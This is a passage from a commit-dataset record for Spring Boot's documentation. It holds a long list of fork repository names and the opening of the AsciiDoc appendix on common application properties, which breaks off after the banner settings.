typo\n","repos":"mbenson\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,AngusZhu\/spring-boot,ojacquemart\/spring-boot,brettwooldridge\/spring-boot,jrrickard\/spring-boot,DONIKAN\/spring-boot,dnsw83\/spring-boot,5zzang\/spring-boot,lingounet\/spring-boot,frost2014\/spring-boot,philwebb\/spring-boot,fireshort\/spring-boot,liupugong\/spring-boot,mouadtk\/spring-boot,clarklj001\/spring-boot,ApiSecRay\/spring-boot,MasterRoots\/spring-boot,jeremiahmarks\/spring-boot,jayarampradhan\/spring-boot,akmaharshi\/jenkins,satheeshmb\/spring-boot,izeye\/spring-boot,murilobr\/spring-boot,npcode\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,htynkn\/spring-boot,mdeinum\/spring-boot,pvorb\/spring-boot,johnktims\/spring-boot,mabernardo\/spring-boot,paddymahoney\/spring-boot,axibase\/spring-boot,bijukunjummen\/spring-boot,vaseemahmed01\/spring-boot,sungha\/spring-boot,zhanhb\/spring-boot,ptahchiev\/spring-boot,pnambiarsf\/spring-boot,okba1\/spring-boot,meftaul\/spring-boot,zorosteven\/spring-boot,vpavic\/spring-boot,marcellodesales\/spring-boot,zhanhb\/spring-boot,npcode\/spring-boot,prasenjit-net\/spring-boot,frost2014\/spring-boot,SPNilsen\/spring-boot,xiaoleiPENG\/my-project,Nowheresly\/spring-boot,hqrt\/jenkins2-course-spring-boot,jrrickard\/spring-boot,bijukunjummen\/spring-boot,johnktims\/spring-boot,NetoDevel\/spring-boot,RobertNickens\/spring-boot,crackien\/spring-boot,vakninr\/spring-boot,eliudiaz\/spring-boot,lokbun\/spring-boot,RainPlanter\/spring-boot,tsachev\/spring-boot,scottfrederick\/spring-boot,jayarampradhan\/spring-boot,lingounet\/spring-boot,M3lkior\/spring-boot,existmaster\/spring-boot,panbiping\/spring-boot,jxblum\/spring-boot,drunklite\/spring-boot,hello2009chen\/spring-boot,mrumpf\/spring-boot,designreuse\/spring-boot,linead\/spring-boot,srikalyan\/spring-boot,xc145214\/spring-boot,ApiSecRay\/spring-boot,patrikbeno\/spring-boot,Chomeh\/spring-boot,prakashme\/spring-boot,mabernardo\/spring-boot,sbuettner\/spring-boot,peteyan\/spring-boot,tbbost\/spring-boot,jayarampradhan\/spring-boot,Makhlab\/spring-boot,nebhale\/spring-boot,duandf35\/spring-boot,fjlopez\/spring-boot,linead\/spring-boot,spring-projects\/spring-boot,zhangshuangquan\/spring-root,fireshort\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,roymanish\/spring-boot,nelswadycki\/spring-boot,qerub\/spring-boot,axelfontaine\/spring-boot,paddymahoney\/spring-boot,patrikbeno\/spring-boot,lucassaldanha\/spring-boot,mlc0202\/spring-boot,rickeysu\/spring-boot,vpavic\/spring-boot,ChunPIG\/spring-boot,meftaul\/spring-boot,linead\/spring-boot,gauravbrills\/spring-boot,pnambiarsf\/spring-boot,i007422\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,srikalyan\/spring-boot,prakashme\/spring-boot,huangyugui\/spring-boot,drumonii\/spring-boot,zhangshuangquan\/spring-root,Buzzardo\/spring-boot,michael-simons\/spring-boot,raiamber1\/spring-boot,existmaster\/spring-boot,isopov\/spring-boot,smilence1986\/spring-boot,jeremiahmarks\/spring-boot,herau\/spring-boot,axibase\/spring-boot,Pokbab\/spring-boot,linead\/spring-boot,RainPlanter\/spring-boot,buobao\/spring-boot,scottfrederick\/spring-boot,rickeysu\/spring-boot,jjankar\/spring-boot,kayelau\/spring-boot,philwebb\/spring-boot,MrMitchellMoore\/spring-boot,yuxiaole\/spring-boot,mouadtk\/spring-boot,xc145214\/spring-boot,existmaster\/spring-boot,orangesdk\/spring-boot,felipeg48\/spring-boot,wwadge\/spring-boot,qq83387856\/spring-boot,fjlopez\/spring-boot,jayarampradhan\/spring-boot,Charkui\/spring-boot,M3lkior\/spring-boot,frost2014\/spring-boot,eonezhang\/spring-boot,meloncocoo\/spring-boot,nevenc-pivotal\/spring-boot,chrylis\/spring-boot,keithsjohnson\/spring-boot,afroje-reshma\/spring-boot-sample,raiamber1\/spring-boot,i007422\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,panbiping\/spring-boot,mosoft521\/spring-boot,huangyugui\/spring-boot,bijukunjummen\/spring-boot,nevenc-pivotal\/spring-boot,fogone\/spring-boot,ralenmandao\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,nghialunhaiha\/spring-boot,AngusZhu\/spring-boot,5zzang\/spring-boot,mlc0202\/spring-boot,mike-kukla\/spring-boot,smayoorans\/spring-boot,SaravananParthasarathy\/SPSDemo,nisuhw\/spring-boot,Makhlab\/spring-boot,RobertNickens\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,zhanhb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,yunbian\/spring-boot,dnsw83\/spring-boot,mouadtk\/spring-boot,paweldolecinski\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,allyjunio\/spring-boot,paweldolecinski\/spring-boot,nurkiewicz\/spring-boot,lingounet\/spring-boot,patrikbeno\/spring-boot,mbenson\/spring-boot,playleud\/spring-boot,javyzheng\/spring-boot,mebinjacob\/spring-boot,jjankar\/spring-boot,sbuettner\/spring-boot,cbtpro\/spring-boot,PraveenkumarShethe\/spring-boot,scottfrederick\/spring-boot,sebastiankirsch\/spring-boot,ojacquemart\/spring-boot,mbogoevici\/spring-boot,patrikbeno\/spring-boot,sbcoba\/spring-boot,nurkiewicz\/spring-boot,playleud\/spring-boot,xingguang2013\/spring-boot,jvz\/spring-boot,dfa1\/spring-boot,trecloux\/spring-boot,ojacquemart\/spring-boot,raiamber1\/spring-boot,shakuzen\/spring-boot,dnsw83\/spring-boot,satheeshmb\/spring-boot,huangyugui\/spring-boot,duandf35\/spring-boot,jvz\/spring-boot,christian-posta\/spring-boot,gauravbrills\/spring-boot,herau\/spring-boot,bbrouwer\/spring-boot,lokbun\/spring-boot,Makhlab\/spring-boot,jbovet\/spring-boot,jbovet\/spring-boot,paweldolecinski\/spring-boot,lexandro\/spring-boot,designreuse\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,qq83387856\/spring-boot,MrMitchellMoore\/spring-boot,sbcoba\/spring-boot,hklv\/spring-boot,navarrogabriela\/spring-boot,tsachev\/spring-boot,cbtpro\/spring-boot,Charkui\/spring-boot,AstaTus\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,mlc0202\/spring-boot,JiweiWong\/spring-boot,scottfrederick\/spring-boot,cleverjava\/jenkins2-course-spring-boot,aahlenst\/spring-boot,prasenjit-net\/spring-boot,Buzzardo\/spring-boot,ractive\/spring-boot,sebastiankirsch\/spring-boot,bjornlindstrom\/spring-boot,hqrt\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,rams2588\/spring-boot,zorosteven\/spring-boot,kdvolder\/spring-boot,mouadtk\/spring-boot,shakuzen\/spring-boot,qerub\/spring-boot,pvorb\/spring-boot,drunklite\/spring-boot,xwjxwj30abc\/spring-boot,yhj630520\/spring-boot,xiaoleiPENG\/my-project,chrylis\/spring-boot,axelfontaine\/spring-boot,rickeysu\/spring-boot,5zzang\/spring-boot,fulvio-m\/spring-boot,smayoorans\/spring-boot,fireshort\/spring-boot,Chomeh\/spring-boot,paweldolecinski\/spring-boot,rweisleder\/spring-boot,smayoorans\/spring-boot,ralenmandao\/spring-boot,AstaTus\/spring-boot,ilayaperumalg\/spring-boot,kamilszymanski\/spring-boot,wwadge\/spring-boot,jjankar\/spring-boot,forestqqqq\/spring-boot,christian-posta\/spring-boot,shangyi0102\/spring-boot,yhj630520\/spring-boot,marcellodesales\/spring-boot,mdeinum\/spring-boot,sbuettner\/spring-boot,JiweiWong\/spring-boot,kdvolder\/spring-boot,NetoDevel\/spring-boot,ihoneymon\/spring-boot,lenicliu\/spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,pnambiarsf\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,dreis2211\/spring-boot,designreuse\/spring-boot,imranansari\/spring-boot,mackeprm\/spring-boot,jxblum\/spring-boot,ptahchiev\/spring-boot,nghiavo\/spring-boot,roberthafner\/spring-boot,allyjunio\/spring-boot,felipeg48\/spring-boot,npcode\/spring-boot,tbbost\/spring-boot,tsachev\/spring-boot,ralenmandao\/spring-boot,cbtpro\/spring-boot,liupugong\/spring-boot,felipeg48\/spring-boot,mosoft521\/spring-boot,ojacquemart\/spring-boot,zhanhb\/spring-boot,Chomeh\/spring-boot,auvik\/spring-boot,RobertNickens\/spring-boot,lucassaldanha\/spring-boot,jack-luj\/spring-boot,jack-luj\/spring-boot,scottfrederick\/spring-boot,rams2588\/spring-boot,xdweleven\/spring-boot,philwebb\/spring-boot,JiweiWong\/spring-boot,RishikeshDarandale\/spring-boot,roberthafner\/spring-boot,jbovet\/spring-boot,afroje-reshma\/spring-boot-sample,linead\/spring-boot,eddumelendez\/spring-boot,akmaharshi\/jenkins,johnktims\/spring-boot,nelswadycki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mebinjacob\/spring-boot,durai145\/spring-boot,joshthornhill\/spring-boot,michael-simons\/spring-boot,wwadge\/spring-boot,jrrickard\/spring-boot,bclozel\/spring-boot,ameraljovic\/spring-boot,hello2009chen\/spring-boot,npcode\/spring-boot,pvorb\/spring-boot,cmsandiga\/spring-boot,forestqqqq\/spring-boot,izeye\/spring-boot,lif123\/spring-boot,5zzang\/spring-boot,Nowheresly\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,jvz\/spring-boot,ihoneymon\/spring-boot,jforge\/spring-boot,joshthornhill\/spring-boot,joansmith\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,yunbian\/spring-boot,jvz\/spring-boot,tbadie\/spring-boot,durai145\/spring-boot,mackeprm\/spring-boot,mackeprm\/spring-boot,bbrouwer\/spring-boot,nelswadycki\/spring-boot,joshiste\/spring-boot,candrews\/spring-boot,pvorb\/spring-boot,yangdd1205\/spring-boot,tsachev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,chrylis\/spring-boot,ptahchiev\/spring-boot,navarrogabriela\/spring-boot,tbadie\/spring-boot,DeezCashews\/spring-boot,fulvio-m\/spring-boot,RichardCSantana\/spring-boot,buobao\/spring-boot,MrMitchellMoore\/spring-boot,roymanish\/spring-boot,neo4j-contrib\/spring-boot,nurkiewicz\/spring-boot,ptahchiev\/spring-boot,mebinjacob\/spring-boot,aahlenst\/spring-boot,neo4j-contrib\/spring-boot,bclozel\/spring-boot,axibase\/spring-boot,yunbian\/spring-boot,herau\/spring-boot,navarrogabriela\/spring-boot,ihoneymon\/spring-boot,JiweiWong\/spring-boot,peteyan\/spring-boot,qq83387856\/spring-boot,aahlenst\/spring-boot,existmaster\/spring-boot,lburgazzoli\/spring-boot,zorosteven\/spring-boot,candrews\/spring-boot,lingounet\/spring-boot,rickeysu\/spring-boot,NetoDevel\/spring-boot,lingounet\/spring-boot,tsachev\/spring-boot,mebinjacob\/spring-boot,wilkinsona\/spring-boot,johnktims\/spring-boot,jxblum\/spring-boot,isopov\/spring-boot,deki\/spring-boot,yhj630520\/spring-boot,sbuettner\/spring-boot,brettwooldridge\/spring-boot,smilence1986\/spring-boot,javyzheng\/spring-boot,nebhale\/spring-boot,drumonii\/spring-boot,jcastaldoFoodEssentials\/spring-boot,fogone\/spring-boot,nghiavo\/spring-boot,drumonii\/spring-boot,buobao\/spring-boot,vakninr\/spring-boot,zorosteven\/spring-boot,vpavic\/spring-boot,mebinjacob\/spring-boot,meloncocoo\/spring-boot,mike-kukla\/spring-boot,smayoorans\/spring-boot,minmay\/spring-boot,cmsandiga\/spring-boot,jforge\/spring-boot,RichardCSantana\/spring-boot,qerub\/spring-boot,na-na\/spring-boot,xingguang2013\/spring-boot,kiranbpatil\/spring-boot,philwebb\/spring-boot-concourse,keithsjohnson\/spring-boot,nghialunhaiha\/spring-boot,nghiavo\/spring-boot,xdweleven\/spring-boot,forestqqqq\/spring-boot,smilence1986\/spring-boot,htynkn\/spring-boot,xdweleven\/spring-boot,ollie314\/spring-boot,hello2009chen\/spring-boot,jmnarloch\/spring-boot,drumonii\/spring-boot,xingguang2013\/spring-boot,Chomeh\/spring-boot,christian-posta\/spring-boot,DeezCashews\/spring-boot,Nowheresly\/spring-boot,ractive\/spring-boot,drumonii\/spring-boot,huangyugui\/spring-boot,vaseemahmed01\/spring-boot,rams2588\/spring-boot,pnambiarsf\/spring-boot,wwadge\/spring-boot,isopov\/spring-boot,axibase\/spring-boot,satheeshmb\/spring-boot,hklv\/spring-boot,buobao\/spring-boot,orangesdk\/spring-boot,axelfontaine\/spring-boot,RainPlanter\/spring-boot,spring-projects\/spring-boot,fireshort\/spring-boot,michael-simons\/spring-boot,ameraljovic\/spring-boot,tbbost\/spring-boot,christian-posta\/spring-boot,jcastaldoFoodEssentials\/spring-boot,xwjxwj30abc\/spring-boot,ChunPIG\/spring-boot,eonezhang\/spring-boot,NetoDevel\/spring-boot,krmcbride\/spring-boot,brettwooldridge\/spring-boot,cmsandiga\/spring-boot,javyzheng\/spring-boot,roymanish\/spring-boot,mbenson\/spring-boot,aahlenst\/spring-boot,okba1\/spring-boot,kamilszymanski\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,drunklite\/spring-boot,royclarkson\/spring-boot,bbrouwer\/spring-boot,aahlenst\/spring-boot,yuxiaole\/spring-boot,peteyan\/spring-boot,lexandro\/spring-boot,donhuvy\/spring-boot,srikalyan\/spring-boot,SaravananParthasarathy\/SPSDemo,thomasdarimont\/spring-boot,huangyugui\/spring-boot,yuxiaole\/spring-boot,thomasdarimont\/spring-boot,murilobr\/spring-boot,murilobr\/spring-boot,i007422\/jenkins2-course-spring-boot,roberthafner\/spring-boot,xc145214\/spring-boot,prasenjit-net\/spring-boot,na-na\/spring-boot,cmsandiga\/spring-boot,joshiste\/spring-boot,MrMitchellMoore\/spring-boot,olivergierke\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,JiweiWong\/spring-boot,cleverjava\/jenkins2-course-spring-boot,rmoorman\/spring-boot,navarrogabriela\/spring-boot,prasenjit-net\/spring-boot,wilkinsona\/spring-boot,paddymahoney\/spring-boot,playleud\/spring-boot,duandf35\/spring-boot,mosoft521\/spring-boot,durai145\/spring-boot,jmnarloch\/spring-boot,vpavic\/spring-boot,crackien\/spring-boot,ilayaperumalg\/spring-boot,raiamber1\/spring-boot,ChunPIG\/spring-boot,jmnarloch\/spring-boot,spring-projects\/spring-boot,joshiste\/spring-boot,rickeysu\/spring-boot,joansmith\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,fjlopez\/spring-boot,na-na\/spring-boot,wilkinsona\/spring-boot,srikalyan\/spring-boot,ralenmandao\/spring-boot,playleud\/spring-boot,bclozel\/spring-boot,jxblum\/spring-boot,MasterRoots\/spring-boot,dreis2211\/spring-boot,marcellodesales\/spring-boot,brettwooldridge\/spring-boot,lif123\/spring-boot,xc145214\/spring-boot,nebhale\/spring-boot,Makhlab\/spring-boot,RishikeshDarandale\/spring-boot,Pokbab\/spring-boot,bbrouwer\/spring-boot,qq83387856\/spring-boot,kdvolder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,kayelau\/spring-boot,playleud\/spring-boot,izeye\/spring-boot,isopov\/spring-boot,ChunPIG\/spring-boot,trecloux\/spring-boot,AstaTus\/spring-boot,bclozel\/spring-boot,afroje-reshma\/spring-boot-sample,hklv\/spring-boot,philwebb\/spring-boot,sbcoba\/spring-boot,buobao\/spring-boot,fireshort\/spring-boot,bbrouwer\/spring-boot,royclarkson\/spring-boot,paddymahoney\/spring-boot,SPNilsen\/spring-boot,javyzheng\/spring-boot,nevenc-pivotal\/spring-boot,fulvio-m\/spring-boot,keithsjohnson\/spring-boot,htynkn\/spring-boot,sebastiankirsch\/spring-boot,roberthafner\/spring-boot,nisuhw\/spring-boot,vakninr\/spring-boot,nebhale\/spring-boot,cbtpro\/spring-boot,mike-kukla\/spring-boot,mackeprm\/spring-boot,Pokbab\/spring-boot,Nowheresly\/spring-boot,balajinsr\/spring-boot,axibase\/spring-boot,rmoorman\/spring-boot,PraveenkumarShethe\/spring-boot,nurkiewicz\/spring-boot,xdweleven\/spring-boot,mosoft521\/spring-boot,neo4j-contrib\/spring-boot,johnktims\/spring-boot,meloncocoo\/spring-boot,lokbun\/spring-boot,lokbun\/spring-boot,jforge\/spring-boot,michael-simons\/spring-boot,auvik\/spring-boot,mike-kukla\/spring-boot,vaseemahmed01\/spring-boot,brettwooldridge\/spring-boot,RobertNickens\/spring-boot,tiarebalbi\/spring-boot,joshthornhill\/spring-boot,roberthafner\/spring-boot,bijukunjummen\/spring-boot,allyjunio\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,auvik\/spring-boot,nisuhw\/spring-boot,durai145\/spring-boot,zhangshuangquan\/spring-root,jack-luj\/spring-boot,krmcbride\/spring-boot,balajinsr\/spring-boot,izeye\/spring-boot,mabernardo\/spring-boot,hklv\/spring-boot,M3lkior\/spring-boot,lokbun\/spring-boot,DeezCashews\/spring-boot,candrews\/spring-boot,xiaoleiPENG\/my-project,kamilszymanski\/spring-boot,clarklj001\/spring-boot,hqrt\/jenkins2-course-spring-boot,isopov\/spring-boot,forestqqqq\/spring-boot,akmaharshi\/jenkins,smayoorans\/spring-boot,dfa1\/spring-boot,akmaharshi\/jenkins,SPNilsen\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,deki\/spring-boot,jack-luj\/spring-boot,jxblum\/spring-boot,nghialunhaiha\/spring-boot,mdeinum\/spring-boot,kamilszymanski\/spring-boot,designreuse\/spring-boot,kiranbpatil\/spring-boot,roymanish\/spring-boot,afroje-reshma\/spring-boot-sample,eddumelendez\/spring-boot,yunbian\/spring-boot,jayarampradhan\/spring-boot,mbogoevici\/spring-boot,felipeg48\/spring-boot,gauravbrills\/spring-boot,joansmith\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,tbadie\/spring-boot,duandf35\/spring-boot,okba1\/spring-boot,eliudiaz\/spring-boot,frost2014\/spring-boot,jbovet\/spring-boot,rams2588\/spring-boot,fogone\/spring-boot,M3lkior\/spring-boot,thomasdarimont\/spring-boot,SaravananParthasarathy\/SPSDemo,olivergierke\/spring-boot,murilobr\/spring-boot,crackien\/spring-boot,dfa1\/spring-boot,tiarebalbi\/spring-boot,lburgazzoli\/spring-boot,lif123\/spring-boot,xdweleven\/spring-boot,vaseemahmed01\/spring-boot,rmoorman\/spring-boot,rweisleder\/spring-boot,kiranbpatil\/spring-boot,lucassaldanha\/spring-boot,christian-posta\/spring-boot,habuma\/spring-boot,na-na\/spring-boot,fulvio-m\/spring-boot,sbcoba\/spring-boot,AstaTus\/spring-boot,trecloux\/spring-boot,candrews\/spring-boot,mabernardo\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot-concourse,dfa1\/spring-boot,imranansari\/spring-boot,philwebb\/spring-boot-concourse,liupugong\/spring-boot,spring-projects\/spring-boot,okba1\/spring-boot,orangesdk\/spring-boot,shangyi0102\/spring-boot,wilkinsona\/spring-boot,zorosteven\/spring-boot,michael-simons\/spring-boot,dfa1\/spring-boot,ractive\/spring-boot,auvik\/spring-boot,lif123\/spring-boot,PraveenkumarShethe\/spring-boot,prakashme\/spring-boot,RishikeshDarandale\/spring-boot,philwebb\/spring-boot-concourse,fulvio-m\/spring-boot,okba1\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,Chomeh\/spring-boot,meftaul\/spring-boot,chrylis\/spring-boot,eliudiaz\/spring-boot,ihoneymon\/spring-boot,jcastaldoFoodEssentials\/spring-boot,jrrickard\/spring-boot,aahlenst\/spring-boot,drunklite\/spring-boot,jvz\/spring-boot,imranansari\/spring-boot,designreuse\/spring-boot,eliudiaz\/spring-boot,jjankar\/spring-boot,rmoorman\/spring-boot,peteyan\/spring-boot,satheeshmb\/spring-boot,patrikbeno\/spring-boot,meloncocoo\/spring-boot,lenicliu\/spring-boot,DeezCashews\/spring-boot,isopov\/spring-boot,wwadge\/spring-boot,philwebb\/spring-boot,habuma\/spring-boot,ilayaperumalg\/spring-boot,sbuettner\/spring-boot,ojacquemart\/spring-boot,bclozel\/spring-boot,RishikeshDarandale\/spring-boot,habuma\/spring-boot,smilence1986\/spring-boot,kamilszymanski\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,shangyi0102\/spring-boot,jjankar\/spring-boot,drunklite\/spring-boot,mouadtk\/spring-boot,dnsw83\/spring-boot,krmcbride\/spring-boot,crackien\/spring-boot,meloncocoo\/spring-boot,Charkui\/spring-boot,meftaul\/spring-boot,hqrt\/jenkins2-course-spring-boot,xwjxwj30abc\/spring-boot,bclozel\/spring-boot,prakashme\/spring-boot,clarklj001\/spring-boot,mackeprm\/spring-boot,SaravananParthasarathy\/SPSDemo,qq83387856\/spring-boot,RainPlanter\/spring-boot,RishikeshDarandale\/spring-boot,habuma\/spring-boot,rweisleder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,dnsw83\/spring-boot,joansmith\/spring-boot,lexandro\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,MasterRoots\/spring-boot,marcellodesales\/spring-boot,mbenson\/spring-boot,mosoft521\/spring-boot,sbcoba\/spring-boot,minmay\/spring-boot,paweldolecinski\/spring-boot,royclarkson\/spring-boot,michael-simons\/spring-boot,mlc0202\/spring-boot,prasenjit-net\/spring-boot,herau\/spring-boot,SPNilsen\/spring-boot,nevenc-pivotal\/spring-boot,wilkinsona\/spring-boot,yunbian\/spring-boot,lburgazzoli\/spring-boot,tbbost\/spring-boot,raiamber1\/spring-boot,mrumpf\/spring-boot,axelfontaine\/spring-boot,kiranbpatil\/spring-boot,DONIKAN\/spring-boot,SaravananParthasarathy\/SPSDemo,olivergierke\/spring-boot,mabernardo\/spring-boot,mrumpf\/spring-boot,trecloux\/spring-boot,RichardCSantana\/spring-boot,dreis2211\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joansmith\/spring-boot,ractive\/spring-boot,tsachev\/spring-boot,qerub\/spring-boot,MasterRoots\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,duandf35\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,pvorb\/spring-boot,xwjxwj30abc\/spring-boot,mbogoevici\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,srikalyan\/spring-boot,joshthornhill\/spring-boot,paddymahoney\/spring-boot,bjornlindstrom\/spring-boot,philwebb\/spring-boot-concourse,nghiavo\/spring-boot,mike-kukla\/spring-boot,ralenmandao\/spring-boot,jbovet\/spring-boot,eliudiaz\/spring-boot,lenicliu\/spring-boot,lexandro\/spring-boot,tbadie\/spring-boot,fjlopez\/spring-boot,ollie314\/spring-boot,hello2009chen\/spring-boot,bjornlindstrom\/spring-boot,fogone\/spring-boot,neo4j-contrib\/spring-boot,na-na\/spring-boot,auvik\/spring-boot,ilayaperumalg\/spring-boot,nurkiewicz\/spring-boot,bjornlindstrom\/spring-boot,mdeinum\/spring-boot,ihoneymon\/spring-boot,akmaharshi\/jenkins,vaseemahmed01\/spring-boot,krmcbride\/spring-boot,Pokbab\/spring-boot,jmnarloch\/spring-boot,sungha\/spring-boot,nisuhw\/spring-boot,deki\/spring-boot,thomasdarimont\/spring-boot,nghiavo\/spring-boot,orangesdk\/spring-boot,lif123\/spring-boot,rweisleder\/spring-boot,zhangshuangquan\/spring-root,peteyan\/spring-boot,nelswadycki\/spring-boot,jeremiahmarks\/spring-boot,navarrogabriela\/spring-boot,Makhlab\/spring-boot,nisuhw\/spring-boot,olivergierke\/spring-boot,sebastiankirsch\/spring-boot,nevenc-pivotal\/spring-boot,xingguang2013\/spring-boot,RichardCSantana\/spring-boot,spring-projects\/spring-boot,minmay\/spring-boot,frost2014\/spring-boot,javyzheng\/spring-boot,imranansari\/spring-boot,royclarkson\/spring-boot,hello2009chen\/spring-boot,durai145\/spring-boot,gauravbrills\/spring-boot,yhj630520\/spring-boot,mbenson\/spring-boot,nghialunhaiha\/spring-boot,fjlopez\/spring-boot,keithsjohnson\/spring-boot,jcastaldoFoodEssentials\/spring-boot,yangdd1205\/spring-boot,tbadie\/spring-boot,axelfontaine\/spring-boot,nelswadycki\/spring-boot,mbenson\/spring-boot,sebastiankirsch\/spring-boot,roymanish\/spring-boot,qerub\/spring-boot,Charkui\/spring-boot,RichardCSantana\/spring-boot,mbogoevici\/spring-boot,panbiping\/spring-boot,RobertNickens\/spring-boot,habuma\/spring-boot,lexandro\/spring-boot,vakninr\/spring-boot,cbtpro\/spring-boot,Pokbab\/spring-boot,shangyi0102\/spring-boot,rweisleder\/spring-boot,donhuvy\/spring-boot,AngusZhu\/spring-boot,trecloux\/spring-boot,rams2588\/spring-boot,clarklj001\/spring-boot,meftaul\/spring-boot,zhanhb\/spring-boot,sungha\/spring-boot,nghialunhaiha\/spring-boot,Charkui\/spring-boot,xiaoleiPENG\/my-project,jack-luj\/spring-boot,i007422\/jenkins2-course-spring-boot,MasterRoots\/spring-boot,yuxiaole\/spring-boot,allyjunio\/spring-boot,fogone\/spring-boot,tiarebalbi\/spring-boot,felipeg48\/spring-boot,tiarebalbi\/spring-boot,cleverjava\/jenkins2-course-spring-boot,npcode\/spring-boot,kayelau\/spring-boot,herau\/spring-boot,nebhale\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,clarklj001\/spring-boot,gauravbrills\/spring-boot,dreis2211\/spring-boot,mlc0202\/spring-boot,jforge\/spring-boot,neo4j-contrib\/spring-boot,donhuvy\/spring-boot,jforge\/spring-boot,balajinsr\/spring-boot,rmoorman\/spring-boot,forestqqqq\/spring-boot,balajinsr\/spring-boot,crackien\/spring-boot,spring-projects\/spring-boot,lucassaldanha\/spring-boot,pnambiarsf\/spring-boot,AngusZhu\/spring-boot,ractive\/spring-boot,Nowheresly\/spring-boot,deki\/spring-boot,cmsandiga\/spring-boot,izeye\/spring-boot,minmay\/spring-boot,liupugong\/spring-boot,tiarebalbi\/spring-boot,kayelau\/spring-boot,shakuzen\/spring-boot,orangesdk\/spring-boot,joshiste\/spring-boot,hqrt\/jenkins2-course-spring-boot,candrews\/spring-boot,htynkn\/spring-boot,ameraljovic\/spring-boot,lburgazzoli\/spring-boot,PraveenkumarShethe\/spring-boot,RainPlanter\/spring-boot,liupugong\/spring-boot,panbiping\/spring-boot,ApiSecRay\/spring-boot,tbbost\/spring-boot,jeremiahmarks\/spring-boot,jrrickard\/spring-boot,zhangshuangquan\/spring-root,DONIKAN\/spring-boot,balajinsr\/spring-boot,mbogoevici\/spring-boot,ilayaperumalg\/spring-boot,hklv\/spring-boot,allyjunio\/spring-boot,jeremiahmarks\/spring-boot,kiranbpatil\/spring-boot,eonezhang\/spring-boot,sungha\/spring-boot,imranansari\/spring-boot,bijukunjummen\/spring-boot,marcellodesales\/spring-boot,kdvolder\/spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,vakninr\/spring-boot,yhj630520\/spring-boot,krmcbride\/spring-boot,habuma\/spring-boot,royclarkson\/spring-boot,shakuzen\/spring-boot,prakashme\/spring-boot,lenicliu\/spring-boot,murilobr\/spring-boot,lucassaldanha\/spring-boot,joshthornhill\/spring-boot,existmaster\/spring-boot,xingguang2013\/spring-boot,DONIKAN\/spring-boot,xwjxwj30abc\/spring-boot,philwebb\/spring-boot,AngusZhu\/spring-boot,olivergierke\/spring-boot,eonezhang\/spring-boot,dreis2211\/spring-boot,eonezhang\/spring-boot,smilence1986\/spring-boot,ilayaperumalg\/spring-boot,satheeshmb\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,MrMitchellMoore\/spring-boot,minmay\/spring-boot,ApiSecRay\/spring-boot,DONIKAN\/spring-boot,ApiSecRay\/spring-boot,thomasdarimont\/spring-boot,vpavic\/spring-boot,keithsjohnson\/spring-boot,jcastaldoFoodEssentials\/spring-boot,M3lkior\/spring-boot,yuxiaole\/spring-boot,5zzang\/spring-boot,xc145214\/spring-boot,PraveenkumarShethe\/spring-boot,ChunPIG\/spring-boot,kdvolder\/spring-boot,mrumpf\/spring-boot,SPNilsen\/spring-boot,panbiping\/spring-boot,kayelau\/spring-boot,AstaTus\/spring-boot,lburgazzoli\/spring-boot,sungha\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/appendix-application-properties.adoc","new_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches. This section provides a list common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application. ^^^\n\t# ===================================================================\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n # BANNER\n banner.charset=UTF-8 # banner file encoding\n banner.location=classpath:banner.txt # banner file location\n\n\t# SPRING CONFIG 